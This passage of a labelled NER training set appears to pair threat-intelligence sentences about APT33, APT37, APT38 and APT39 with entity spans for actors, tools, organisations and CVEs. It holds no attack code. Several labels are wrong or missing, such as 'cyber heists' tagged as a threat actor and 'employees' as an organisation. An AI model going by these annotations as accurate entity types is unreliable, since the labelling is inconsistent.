"dnrti_train_000192", "source": "dnrti_train"}} {"text": "APT33 's targeting of organizations 
involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "THREAT_ACTOR: threat actor": [[137, 149]]}, "info": {"id": "dnrti_train_000193", "source": "dnrti_train"}} {"text": "APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "THREAT_ACTOR: threat groups": [[93, 106]]}, "info": {"id": "dnrti_train_000194", "source": "dnrti_train"}} {"text": "This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government .", "spans": {"TOOL: name servers": [[139, 151]], "THREAT_ACTOR: APT33": [[181, 186]]}, "info": {"id": "dnrti_train_000195", "source": "dnrti_train"}} {"text": "The publicly available backdoors and tools utilized by APT33 – including NANOCORE , NETWIRE , and ALFA Shell – are all available on Iranian hacking websites , associated with Iranian hackers , and used by other suspected Iranian threat groups .", "spans": {"THREAT_ACTOR: APT33": [[55, 60]], "TOOL: NANOCORE": [[73, 81]], "TOOL: NETWIRE": [[84, 91]], "TOOL: ALFA Shell": [[98, 108]], "THREAT_ACTOR: hackers": [[183, 190]], "THREAT_ACTOR: threat groups": [[229, 242]]}, "info": {"id": "dnrti_train_000196", "source": "dnrti_train"}} {"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "dnrti_train_000197", "source": "dnrti_train"}} {"text": "Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of 
strategic intelligence capable of benefitting a government or military sponsor .", "spans": {"ORGANIZATION: energy sectors": [[67, 81]], "THREAT_ACTOR: APT33": [[101, 106]]}, "info": {"id": "dnrti_train_000198", "source": "dnrti_train"}} {"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "dnrti_train_000199", "source": "dnrti_train"}} {"text": "We expect APT33 activity will continue to cover a broad scope of targeted entities , and may spread into other regions and sectors as Iranian interests dictate .", "spans": {}, "info": {"id": "dnrti_train_000200", "source": "dnrti_train"}} {"text": "The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": {"THREAT_ACTOR: Elfin": [[4, 9]], "THREAT_ACTOR: espionage group": [[10, 25]], "THREAT_ACTOR: APT33": [[32, 37]]}, "info": {"id": "dnrti_train_000201", "source": "dnrti_train"}} {"text": "On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" ( referred to as GroupB in this blog post ) to APT33 , operating at the behest of the Iranian government .", "spans": {"ORGANIZATION: FireEye 's Advanced Practices": [[17, 46]], "THREAT_ACTOR: APT33": [[153, 158]]}, "info": {"id": "dnrti_train_000202", "source": "dnrti_train"}} {"text": "The Elfin group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": {"THREAT_ACTOR: Elfin group": [[4, 15]], "THREAT_ACTOR: APT33": [[22, 27]]}, "info": {"id": "dnrti_train_000203", "source": "dnrti_train"}} {"text": "On May 
16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" to APT33 , operating at the behest of the Iranian government .", "spans": {"ORGANIZATION: FireEye 's Advanced Practices": [[17, 46]], "THREAT_ACTOR: APT33": [[109, 114]]}, "info": {"id": "dnrti_train_000204", "source": "dnrti_train"}} {"text": "APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea .", "spans": {"THREAT_ACTOR: APT37": [[0, 5]]}, "info": {"id": "dnrti_train_000205", "source": "dnrti_train"}} {"text": "In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities .", "spans": {"THREAT_ACTOR: APT37": [[10, 15]], "ORGANIZATION: healthcare entities": [[240, 259]]}, "info": {"id": "dnrti_train_000206", "source": "dnrti_train"}} {"text": "In 2017 , APT37 targeted a company in Middle East that entered into a joint venture with the North Korean government to provide telecommunications service to the country .", "spans": {"THREAT_ACTOR: APT37": [[10, 15]]}, "info": {"id": "dnrti_train_000207", "source": "dnrti_train"}} {"text": "While not conclusive by itself , the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33 's familiarity with them and lends support to the assessment that APT33 may be based in Iran .", "spans": {"ORGANIZATION: hosting companies": [[105, 122]], "THREAT_ACTOR: APT33": [[142, 147], [214, 219]]}, "info": {"id": "dnrti_train_000208", "source": "dnrti_train"}} {"text": "North Korean defector and human rights-related targeting provides further evidence that APT37 conducts operations aligned with the interests of North Korea .", "spans": {"THREAT_ACTOR: APT37": [[88, 93]]}, "info": {"id": "dnrti_train_000209", 
"source": "dnrti_train"}} {"text": "In 2017 , APT37 targeted a Middle Eastern company that entered into a joint venture with the North Korean government to provide telecommunications service to the country ( read on for a case study ) .", "spans": {"THREAT_ACTOR: APT37": [[10, 15]], "ORGANIZATION: company": [[42, 49]]}, "info": {"id": "dnrti_train_000210", "source": "dnrti_train"}} {"text": "APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": {"THREAT_ACTOR: APT37": [[0, 5]], "ORGANIZATION: research fellow": [[17, 32]], "ORGANIZATION: advisory member": [[35, 50]], "ORGANIZATION: journalist": [[57, 67]], "ORGANIZATION: strategic organizations": [[131, 154]]}, "info": {"id": "dnrti_train_000211", "source": "dnrti_train"}} {"text": "APT37 distributed SLOWDRIFT malware using a lure referencing the Korea Global Forum against academic and strategic institutions located in South Korea .", "spans": {"THREAT_ACTOR: APT37": [[0, 5]], "TOOL: SLOWDRIFT malware": [[18, 35]], "ORGANIZATION: academic": [[92, 100]], "ORGANIZATION: strategic institutions": [[105, 127]]}, "info": {"id": "dnrti_train_000212", "source": "dnrti_train"}} {"text": "We believe a organization located in Middle East was targeted by APT37 because it had been involved with a North Korean company and a business deal went bad .", "spans": {"THREAT_ACTOR: APT37": [[65, 70]], "ORGANIZATION: company": [[120, 127]]}, "info": {"id": "dnrti_train_000213", "source": "dnrti_train"}} {"text": "In one instance , APT37 weaponized a video downloader application with KARAE malware that was indiscriminately distributed to South Korean victims through torrent websites .", "spans": {"THREAT_ACTOR: APT37": [[18, 23]], "TOOL: KARAE malware": [[71, 84]]}, "info": {"id": "dnrti_train_000214", "source": "dnrti_train"}} {"text": "FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe 
Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT37": [[54, 59]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[72, 106]], "VULNERABILITY: CVE-2018-4878": [[109, 122]], "TOOL: DOGCALL malware": [[139, 154]]}, "info": {"id": "dnrti_train_000215", "source": "dnrti_train"}} {"text": "FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"ORGANIZATION: FireEye iSIGHT Intelligence": [[0, 27]], "THREAT_ACTOR: APT37": [[74, 79]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[92, 126]], "VULNERABILITY: CVE-2018-4878": [[129, 142]], "TOOL: DOGCALL malware": [[159, 174]]}, "info": {"id": "dnrti_train_000216", "source": "dnrti_train"}} {"text": "In April 2017 , APT37 targeted South Korean military and government organizations with the DOGCALL backdoor and RUHAPPY wiper malware .", "spans": {"THREAT_ACTOR: APT37": [[16, 21]], "ORGANIZATION: military": [[44, 52]], "ORGANIZATION: government organizations": [[57, 81]], "TOOL: DOGCALL backdoor": [[91, 107]], "TOOL: RUHAPPY wiper malware": [[112, 133]]}, "info": {"id": "dnrti_train_000217", "source": "dnrti_train"}} {"text": "It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations .", "spans": {"THREAT_ACTOR: APT37": [[20, 25]], "TOOL: KARAE malware": [[45, 58]]}, "info": {"id": "dnrti_train_000218", "source": "dnrti_train"}} {"text": "We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea .", "spans": {"THREAT_ACTOR: APT37": [[36, 41]]}, "info": {"id": 
"dnrti_train_000219", "source": "dnrti_train"}} {"text": "The compilation times of APT37 malware is consistent with a developer operating in the North Korea time zone ( UTC +8:30 ) and follows what is believed to be a typical North Korean workday .", "spans": {"TOOL: APT37 malware": [[25, 38]]}, "info": {"id": "dnrti_train_000220", "source": "dnrti_train"}} {"text": "The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": {"ORGANIZATION: defectors": [[78, 87]]}, "info": {"id": "dnrti_train_000221", "source": "dnrti_train"}} {"text": "Similarly , APT37 targeting of a company located in Middle East in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": {"THREAT_ACTOR: APT37": [[12, 17]]}, "info": {"id": "dnrti_train_000222", "source": "dnrti_train"}} {"text": "Similarly , APT37 targeting of a Middle Eastern company in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": {"THREAT_ACTOR: APT37": [[12, 17]], "ORGANIZATION: company": [[48, 55]]}, "info": {"id": "dnrti_train_000223", "source": "dnrti_train"}} {"text": "In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": {"THREAT_ACTOR: APT37": [[14, 19]], "ORGANIZATION: board member": [[86, 98]], "ORGANIZATION: financial company": [[119, 136]]}, "info": {"id": "dnrti_train_000224", "source": "dnrti_train"}} {"text": "Though they have primarily tapped other tracked suspected North Korean teams to carry out the most aggressive actions , APT37 is an additional tool available to the regime , perhaps even desirable for its relative obscurity .", "spans": {"THREAT_ACTOR: APT37": [[120, 125]]}, "info": {"id": "dnrti_train_000225", "source": 
"dnrti_train"}} {"text": "ScarCruft is a relatively new APT group , victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]], "THREAT_ACTOR: APT group": [[30, 39]]}, "info": {"id": "dnrti_train_000226", "source": "dnrti_train"}} {"text": "Certain details , such as using the same infrastructure and targeting , make us believe that Operation Daybreak is being done by the ScarCruft APT group .", "spans": {"THREAT_ACTOR: ScarCruft": [[133, 142]], "THREAT_ACTOR: APT group": [[143, 152]]}, "info": {"id": "dnrti_train_000227", "source": "dnrti_train"}} {"text": "Prior to the discovery of Operation Daybreak , we observed the ScarCruft APT launching a series of attacks in Operation Erebus .", "spans": {"THREAT_ACTOR: ScarCruft APT": [[63, 76]]}, "info": {"id": "dnrti_train_000228", "source": "dnrti_train"}} {"text": "Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails .", "spans": {"THREAT_ACTOR: attackers": [[60, 69]]}, "info": {"id": "dnrti_train_000229", "source": "dnrti_train"}} {"text": "Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails .", "spans": {"THREAT_ACTOR: APT37": [[52, 57]]}, "info": {"id": "dnrti_train_000230", "source": "dnrti_train"}} {"text": "On occasion the APT37 directly included the ROKRAT payload in the malicious document and during other campaigns the attackers leveraged multi-stage infection processes .", "spans": {"THREAT_ACTOR: APT37": [[16, 21]], "TOOL: ROKRAT": [[44, 50]], "THREAT_ACTOR: attackers": [[116, 125]]}, "info": {"id": "dnrti_train_000231", "source": "dnrti_train"}} {"text": "In the early part of 2017 , Group123 started the \" Evil New Year \" campaign .", "spans": {"THREAT_ACTOR: Group123": [[28, 36]]}, "info": {"id": "dnrti_train_000232", "source": "dnrti_train"}} {"text": "In November 2017 , Talos 
observed the latest Group123 campaign of the year , which included a new version of ROKRAT being used in the latest wave of attacks .", "spans": {"ORGANIZATION: Talos": [[19, 24]], "TOOL: ROKRAT": [[109, 115]]}, "info": {"id": "dnrti_train_000233", "source": "dnrti_train"}} {"text": "Group123 is constantly evolving as the new fileless capability that was added to ROKRAT demonstrates .", "spans": {"THREAT_ACTOR: Group123": [[0, 8]], "TOOL: ROKRAT": [[81, 87]]}, "info": {"id": "dnrti_train_000234", "source": "dnrti_train"}} {"text": "In this campaign , the Group123 used a classical HWP document in order to download and execute a previously unknown malware : NavRAT .", "spans": {"THREAT_ACTOR: Group123": [[23, 31]], "TOOL: HWP document": [[49, 61]], "TOOL: NavRAT": [[126, 132]]}, "info": {"id": "dnrti_train_000235", "source": "dnrti_train"}} {"text": "However , we asses with medium confidence that NavRAT is linked to Group123 .", "spans": {"TOOL: NavRAT": [[47, 53]], "THREAT_ACTOR: Group123": [[67, 75]]}, "info": {"id": "dnrti_train_000236", "source": "dnrti_train"}} {"text": "APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "THREAT_ACTOR: regime-backed group": [[46, 65]], "ORGANIZATION: financial institutions": [[121, 143]], "THREAT_ACTOR: cyber heists": [[186, 198]]}, "info": {"id": "dnrti_train_000237", "source": "dnrti_train"}} {"text": "APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "THREAT_ACTOR: regime-backed group": [[46, 65]], "ORGANIZATION: financial institutions": [[121, 143]]}, "info": {"id": "dnrti_train_000238", "source": "dnrti_train"}} {"text": "APT38 is believed to operate more 
similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial institutions": [[127, 149]]}, "info": {"id": "dnrti_train_000239", "source": "dnrti_train"}} {"text": "The group has compromised more than 16 organizations in at least 13 different countries , sometimes simultaneously , since at least 2014 .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_000240", "source": "dnrti_train"}} {"text": "APT38 shares malware code and other development resources with TEMP.Hermit North Korean cyber espionage activity , although we consider APT38 .", "spans": {"THREAT_ACTOR: APT38": [[0, 5], [136, 141]], "THREAT_ACTOR: TEMP.Hermit": [[63, 74]]}, "info": {"id": "dnrti_train_000241", "source": "dnrti_train"}} {"text": "We consider APT38 's operations more global and highly specialized for targeting the financial sector .", "spans": {"THREAT_ACTOR: APT38": [[12, 17]], "ORGANIZATION: financial sector": [[85, 101]]}, "info": {"id": "dnrti_train_000242", "source": "dnrti_train"}} {"text": "APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "THREAT_ACTOR: group": [[33, 38]], "THREAT_ACTOR: cyber espionage operators": [[62, 87]], "ORGANIZATION: financial institutions": [[158, 180]]}, "info": {"id": "dnrti_train_000243", "source": "dnrti_train"}} {"text": "Because APT38 is backed by ( and acts on behalf of ) the North Korean regime , we opted to categorize the group as an \" APT \" instead of a \" FIN \" .", "spans": {"THREAT_ACTOR: APT38": [[8, 13]], "THREAT_ACTOR: group": [[106, 111]], "THREAT_ACTOR: APT": [[120, 123]]}, "info": {"id": 
"dnrti_train_000244", "source": "dnrti_train"}} {"text": "Over time these malware similarities diverged , as did targeting , intended outcomes , and TTPs , almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship .", "spans": {"THREAT_ACTOR: operational groups": [[175, 193]]}, "info": {"id": "dnrti_train_000245", "source": "dnrti_train"}} {"text": "Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime .", "spans": {"THREAT_ACTOR: APT38": [[43, 48]], "ORGANIZATION: financial institutions": [[81, 103]]}, "info": {"id": "dnrti_train_000246", "source": "dnrti_train"}} {"text": "Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions .", "spans": {"THREAT_ACTOR: APT38": [[13, 18]], "ORGANIZATION: financial institutions": [[79, 101]]}, "info": {"id": "dnrti_train_000247", "source": "dnrti_train"}} {"text": "APT38 has pursued their main objective of targeting banks and financial entities since at least 2014 .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial entities": [[62, 80]]}, "info": {"id": "dnrti_train_000248", "source": "dnrti_train"}} {"text": "We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission .", "spans": {"ORGANIZATION: government agencies": [[53, 72]], "THREAT_ACTOR: APT38": [[100, 105]]}, "info": {"id": "dnrti_train_000249", "source": "dnrti_train"}} {"text": "The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions .", "spans": {"THREAT_ACTOR: APT38": [[4, 9]], "ORGANIZATION: financial sector": [[61, 77]], 
"ORGANIZATION: financial institutions": [[159, 181]]}, "info": {"id": "dnrti_train_000250", "source": "dnrti_train"}} {"text": "APT38 also targeted financial transaction exchange companies likely because of their proximity to banks .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial transaction exchange companies": [[20, 60]]}, "info": {"id": "dnrti_train_000251", "source": "dnrti_train"}} {"text": "Given the lapse in time between the spear-phishing and the heist activity in the above example , we suggest two separate but related groups under the North Korean regime were responsible for carrying out missions ; one associated with reconnaissance ( TEMP.Hermit or a related group ) and another for the heists ( APT38 ) .", "spans": {"THREAT_ACTOR: groups": [[133, 139]], "THREAT_ACTOR: TEMP.Hermit": [[252, 263]], "THREAT_ACTOR: group": [[277, 282]], "THREAT_ACTOR: APT38": [[314, 319]]}, "info": {"id": "dnrti_train_000252", "source": "dnrti_train"}} {"text": "APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial institutions": [[85, 107]], "TOOL: SWIFT": [[143, 148]]}, "info": {"id": "dnrti_train_000253", "source": "dnrti_train"}} {"text": "We can confirm that the APT38 operator activity is linked to the North Korean regime , but maintains a set of common characteristics , including motivation , malware , targeting , and TTPs that set it apart from other statesponsored operations .", "spans": {}, "info": {"id": "dnrti_train_000254", "source": "dnrti_train"}} {"text": "As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime .", "spans": {"THREAT_ACTOR: APT38": [[62, 67]], "ORGANIZATION: financial institutions": [[103, 125]]}, "info": 
{"id": "dnrti_train_000255", "source": "dnrti_train"}} {"text": "As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime .", "spans": {"THREAT_ACTOR: APT38": [[62, 67]], "ORGANIZATION: financial institutions": [[103, 125]]}, "info": {"id": "dnrti_train_000256", "source": "dnrti_train"}} {"text": "Although the APT38 's primary targets appear to be Financial Exchange banks and other financial organizations , they have also Financial Exchange targeted countries ' media organizations with a focus on the financial sector .", "spans": {"THREAT_ACTOR: APT38": [[13, 18]], "ORGANIZATION: Financial Exchange banks": [[51, 75]], "ORGANIZATION: financial organizations": [[86, 109]], "ORGANIZATION: media organizations": [[167, 186]], "ORGANIZATION: financial sector": [[207, 223]]}, "info": {"id": "dnrti_train_000257", "source": "dnrti_train"}} {"text": "Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": {"THREAT_ACTOR: APT38": [[39, 44]], "ORGANIZATION: international entities": [[159, 181]], "THREAT_ACTOR: TEMP.Hermit": [[192, 203]]}, "info": {"id": "dnrti_train_000258", "source": "dnrti_train"}} {"text": "TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": {"THREAT_ACTOR: TEMP.Hermit": [[0, 11]]}, "info": {"id": "dnrti_train_000259", "source": "dnrti_train"}} {"text": "While North Korean cyber operations against specific countries may have been driven by diplomatic factors and perceived insults against Pyongyang , the application of increasingly restrictive and numerous financial sanctions against North Korea probably contributed to the formation of 
APT38 .", "spans": {"THREAT_ACTOR: APT38": [[286, 291]]}, "info": {"id": "dnrti_train_000260", "source": "dnrti_train"}} {"text": "APT38 's operations began in February 2014 and were likely influenced by financial sanctions enacted in March 2013 that blocked bulk cash transfers and restricted North Korea 's access to international banking systems .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]]}, "info": {"id": "dnrti_train_000261", "source": "dnrti_train"}} {"text": "APT37 ( Reaper ) , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": {"THREAT_ACTOR: APT37": [[0, 5]], "THREAT_ACTOR: Reaper": [[8, 14]], "THREAT_ACTOR: state-sponsored group": [[40, 61]], "ORGANIZATION: financial company": [[90, 107]]}, "info": {"id": "dnrti_train_000262", "source": "dnrti_train"}} {"text": "APT37 , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": {"THREAT_ACTOR: APT37": [[0, 5]], "THREAT_ACTOR: state-sponsored group": [[29, 50]], "ORGANIZATION: financial company": [[79, 96]]}, "info": {"id": "dnrti_train_000263", "source": "dnrti_train"}} {"text": "Early APT38 operations suggest that the group began targeting financial institutions with an intent to manipulate financial transaction systems at least as early as February 2014 , although we did not observe fraudulent transactions until 2015 .", "spans": {"THREAT_ACTOR: APT38": [[6, 11]], "THREAT_ACTOR: group": [[40, 45]], "ORGANIZATION: financial institutions": [[62, 84]]}, "info": {"id": "dnrti_train_000264", "source": "dnrti_train"}} {"text": "We do not have evidence that the earliest targeted financial institutions were victimized by fraudulent transactions before APT38 left the compromised environments , possibly indicating that APT38 was conducting reconnaissance-only activity at that time .", "spans": {"ORGANIZATION: financial 
institutions": [[51, 73]], "THREAT_ACTOR: APT38": [[124, 129], [191, 196]]}, "info": {"id": "dnrti_train_000265", "source": "dnrti_train"}} {"text": "In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank .", "spans": {"THREAT_ACTOR: APT38": [[20, 25]], "TOOL: NESTEGG": [[35, 42]], "TOOL: KEYLIME": [[62, 69]], "TOOL: keylogger": [[74, 83]]}, "info": {"id": "dnrti_train_000266", "source": "dnrti_train"}} {"text": "From November 2015 through the end of 2016 , APT38 was involved in at least nine separate compromises against banks .", "spans": {"THREAT_ACTOR: APT38": [[45, 50]]}, "info": {"id": "dnrti_train_000268", "source": "dnrti_train"}} {"text": "Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": {"ORGANIZATION: employees": [[101, 110]], "THREAT_ACTOR: APT38": [[139, 144]]}, "info": {"id": "dnrti_train_000269", "source": "dnrti_train"}} {"text": "Further , the recent DOJ complaint provides insight into initial compromise techniques conducted by North Korean operators against APT38 targets , which may have been leveraged as part of the initial compromise into the targeted organizations .", "spans": {"THREAT_ACTOR: operators": [[113, 122]], "THREAT_ACTOR: APT38": [[131, 136]]}, "info": {"id": "dnrti_train_000270", "source": "dnrti_train"}} {"text": "This is corroborated by our identification of TEMP.Hermit 's use of MACKTRUCK at a bank , preceding the APT38 operation targeting the bank 's SWIFT systems in late 2015 .", "spans": {"THREAT_ACTOR: TEMP.Hermit": [[46, 57]], "TOOL: MACKTRUCK": [[68, 77]], "THREAT_ACTOR: APT38": [[104, 109]]}, "info": {"id": "dnrti_train_000271", "source": "dnrti_train"}} {"text": "APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of 
the fraudulent transactions from the victimized bank .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "TOOL: DYEPACK": [[16, 23]]}, "info": {"id": "dnrti_train_000272", "source": "dnrti_train"}} {"text": "The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": {"THREAT_ACTOR: APT38": [[4, 9]], "TOOL: DYEPACK": [[15, 22]], "ORGANIZATION: bank personnel": [[120, 134]]}, "info": {"id": "dnrti_train_000273", "source": "dnrti_train"}} {"text": "During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities .", "spans": {"THREAT_ACTOR: APT38": [[20, 25]]}, "info": {"id": "dnrti_train_000274", "source": "dnrti_train"}} {"text": "During one reported incident , APT38 caused an outage in the bank 's essential services .", "spans": {"THREAT_ACTOR: APT38": [[31, 36]]}, "info": {"id": "dnrti_train_000275", "source": "dnrti_train"}} {"text": "We attribute APT38 to North Korean state-sponsored operators based on a combination of technical indicators linking the activity to Pyongyang and details released by DOJ implicating North Korean national Park Jin Hyok in a criminal conspiracy .", "spans": {"THREAT_ACTOR: APT38": [[13, 18]], "THREAT_ACTOR: operators": [[51, 60]]}, "info": {"id": "dnrti_train_000276", "source": "dnrti_train"}} {"text": "As detailed in the DOJ complaint , a sample of WHITEOUT malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": {"TOOL: WHITEOUT malware": [[47, 63]], "THREAT_ACTOR: APT38": [[80, 85]]}, "info": {"id": "dnrti_train_000277", "source": "dnrti_train"}} {"text": "APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], 
"ORGANIZATION: financial institutions": [[67, 89]]}, "info": {"id": "dnrti_train_000278", "source": "dnrti_train"}} {"text": "Malware overlaps between APT38 and TEMP.Hermit highlight the shared development resources accessible by multiple operational groups linked to North Korean state-sponsored activity .", "spans": {"THREAT_ACTOR: APT38": [[25, 30]], "THREAT_ACTOR: TEMP.Hermit": [[35, 46]], "THREAT_ACTOR: operational groups": [[113, 131]]}, "info": {"id": "dnrti_train_000281", "source": "dnrti_train"}} {"text": "APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "ORGANIZATION: telecommunications sector": [[26, 51]], "ORGANIZATION: IT firms": [[107, 115]]}, "info": {"id": "dnrti_train_000282", "source": "dnrti_train"}} {"text": "This is evidence of shared motivation and intent to target the SWIFT system by the North Korean operators performing the reconnaissance and APT38 which later targeted that organization .", "spans": {"THREAT_ACTOR: operators": [[96, 105]], "THREAT_ACTOR: APT38": [[140, 145]]}, "info": {"id": "dnrti_train_000283", "source": "dnrti_train"}} {"text": "Although APT38 is distinct from other TEMP.Hermit activity , both groups operate consistently within the interests of the North Korean state .", "spans": {"THREAT_ACTOR: APT38": [[9, 14]], "THREAT_ACTOR: groups": [[66, 72]]}, "info": {"id": "dnrti_train_000284", "source": "dnrti_train"}} {"text": "Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea .", "spans": {"THREAT_ACTOR: APT38": [[109, 114]], "THREAT_ACTOR: cyber operators": [[125, 140]], "THREAT_ACTOR: TEMP.Hermit": [[151, 162]], "ORGANIZATION: Lab 110": [[183, 
190]]}, "info": {"id": "dnrti_train_000285", "source": "dnrti_train"}} {"text": "As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": {"TOOL: WHITEOUT": [[47, 55]], "TOOL: Contopee": [[62, 70]], "THREAT_ACTOR: APT38": [[97, 102]]}, "info": {"id": "dnrti_train_000286", "source": "dnrti_train"}} {"text": "Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea 's Reconnaissance General Bureau ( RGB ) .", "spans": {"THREAT_ACTOR: APT38": [[109, 114]], "THREAT_ACTOR: cyber operators": [[125, 140]], "THREAT_ACTOR: TEMP.Hermit": [[151, 162]], "ORGANIZATION: Lab 110": [[183, 190]]}, "info": {"id": "dnrti_train_000287", "source": "dnrti_train"}} {"text": "APT38 's targeting of financial institutions is most likely an effort by the North Korean government to supplement their heavily-sanctioned economy .", "spans": {"THREAT_ACTOR: APT38": [[0, 5]], "ORGANIZATION: financial institutions": [[22, 44]]}, "info": {"id": "dnrti_train_000290", "source": "dnrti_train"}} {"text": "We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East .", "spans": {"THREAT_ACTOR: APT39": [[28, 33]]}, "info": {"id": "dnrti_train_000291", "source": "dnrti_train"}} {"text": "APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "THREAT_ACTOR: groups": [[96, 102]], "ORGANIZATION: FireEye": [[103, 110]]}, "info": {"id": "dnrti_train_000292", "source": 
